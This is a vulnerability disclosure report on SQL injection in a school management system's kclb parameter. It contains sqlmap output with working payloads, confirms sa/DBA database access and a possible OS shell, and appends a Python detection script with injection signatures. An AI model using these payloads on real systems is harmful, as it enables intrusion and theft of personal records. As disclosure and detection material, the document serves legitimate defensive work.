2016-01-18: Details reported to the vendor, awaiting vendor handling
2016-01-19: Vendor confirmed; details disclosed to the vendor only
2016-01-29: Details disclosed to core white hats and relevant domain experts
2016-02-08: Details disclosed to ordinary white hats
2016-02-18: Details disclosed to intern white hats
2016-03-04: Details disclosed to the public
SQL injection with DBA privileges, leaking a large amount of information. The page should also be reachable without authorization!~~~
Injection point:
**.**.**.**:8080/Gmis/pygl/kclbtj_mc.aspx?kclb=A
The kclb parameter is injectable!~~~
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: kclb
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: kclb=A' AND 4392=4392 AND 'ojfl'='ojfl

    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: kclb=A' AND 7018=CONVERT(INT,(SELECT CHAR(113)+CHAR(100)+CHAR(110)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (7018=7018) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(116)+CHAR(118)+CHAR(100)+CHAR(113))) AND 'wIHJ'='wIHJ

    Type: UNION query
    Title: Generic UNION query (NULL) - 10 columns
    Payload: kclb=A' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(100)+CHAR(110)+CHAR(107)+CHAR(113)+CHAR(103)+CHAR(103)+CHAR(70)+CHAR(85)+CHAR(114)+CHAR(115)+CHAR(68)+CHAR(73)+CHAR(107)+CHAR(117)+CHAR(113)+CHAR(116)+CHAR(118)+CHAR(100)+CHAR(113),NULL,NULL,NULL--

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: kclb=A'; WAITFOR DELAY '0:0:5'--

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: kclb=A' WAITFOR DELAY '0:0:5'--
---
[03:56:24] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[03:56:24] [INFO] testing Microsoft SQL Server
[03:56:24] [INFO] confirming Microsoft SQL Server
[03:56:25] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
[03:56:25] [INFO] fetching current user
current user: 'sa'
[03:56:25] [INFO] fetching current database
current database: 'Gmis'
[03:56:25] [INFO] testing if current user is DBA
current user is DBA: True
database management system users [2]:
[*] sa
[*] user_yjs
available databases [6]:
[*] Gmis
[*] master
[*] model
[*] msdb
[*] serverdb
[*] tempdb
Database: Gmis
+--------------------------+---------+
| Table                    | Entries |
+--------------------------+---------+
os-shell is possible.
Can log in and perform any operation!~~~ The admin passwords are stored in plaintext too; not demonstrating that. There is more functionality: student records can be added and deleted at will!~~~
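A detection-side example, added here and not part of the original report: it runs signatures for the five injection techniques sqlmap reported on kclb over constructed IIS W3C-style log lines, then groups the techniques seen per parameter, since several techniques hitting one parameter in a short window is the footprint of an automated scan. The log lines, field layout and function names are assumptions.

```python
import re
from urllib.parse import parse_qsl

# Signatures for the injection techniques sqlmap reported against kclb.
# Each regex is applied to the URL-decoded parameter value.
SIGNATURES = {
    "boolean-blind": re.compile(r"'\s*(?:AND|OR)\s+\d+\s*=\s*\d+", re.I),
    "error-based":   re.compile(r"CONVERT\s*\(\s*INT\s*,", re.I),
    "union":         re.compile(r"UNION\s+(?:ALL\s+)?SELECT\b", re.I),
    "time-based":    re.compile(r"WAITFOR\s+DELAY\b", re.I),
    "stacked":       re.compile(r";\s*(?:WAITFOR|EXEC|DECLARE|INSERT|UPDATE|DELETE)\b", re.I),
}

# Constructed IIS W3C-style lines (not taken from the original report):
# date time cs-method cs-uri-stem cs-uri-query sc-status
SAMPLE_LOG = """\
2016-01-18 03:56:20 GET /Gmis/pygl/kclbtj_mc.aspx kclb=A 200
2016-01-18 03:56:24 GET /Gmis/pygl/kclbtj_mc.aspx kclb=A%27+AND+4392%3D4392+AND+%27ojfl%27%3D%27ojfl 200
2016-01-18 03:56:24 GET /Gmis/pygl/kclbtj_mc.aspx kclb=A%27+UNION+ALL+SELECT+NULL%2CNULL%2CNULL-- 500
2016-01-18 03:56:25 GET /Gmis/pygl/kclbtj_mc.aspx kclb=A%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27-- 200
2016-01-18 03:56:30 GET /Gmis/pygl/kclbtj_mc.aspx kclb=B 200
"""

def classify(value):
    """Return the injection techniques whose signature matches a decoded parameter value."""
    return [name for name, rx in SIGNATURES.items() if rx.search(value)]

def scan_log(text):
    """Return (line_no, uri_stem, param, techniques) for every suspicious query parameter."""
    hits = []
    for n, line in enumerate(text.splitlines(), 1):
        fields = line.split()
        if len(fields) < 6:
            continue
        stem, query = fields[3], fields[4]
        # parse_qsl decodes %xx and '+', so the regexes see the real SQL fragment
        for param, value in parse_qsl(query, keep_blank_values=True):
            found = classify(value)
            if found:
                hits.append((n, stem, param, found))
    return hits

def techniques_per_param(hits):
    """Collapse hits into {(stem, param): set(techniques)}; many techniques on one
    parameter is what an automated scanner such as sqlmap leaves behind."""
    summary = {}
    for _, stem, param, found in hits:
        summary.setdefault((stem, param), set()).update(found)
    return summary
```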
Restrict database privileges, filter input and fix the injection.
Severity level: Medium
Vulnerability Rank: 6
Confirmation time: 2016-01-19 15:31
Notified, being processed
None yet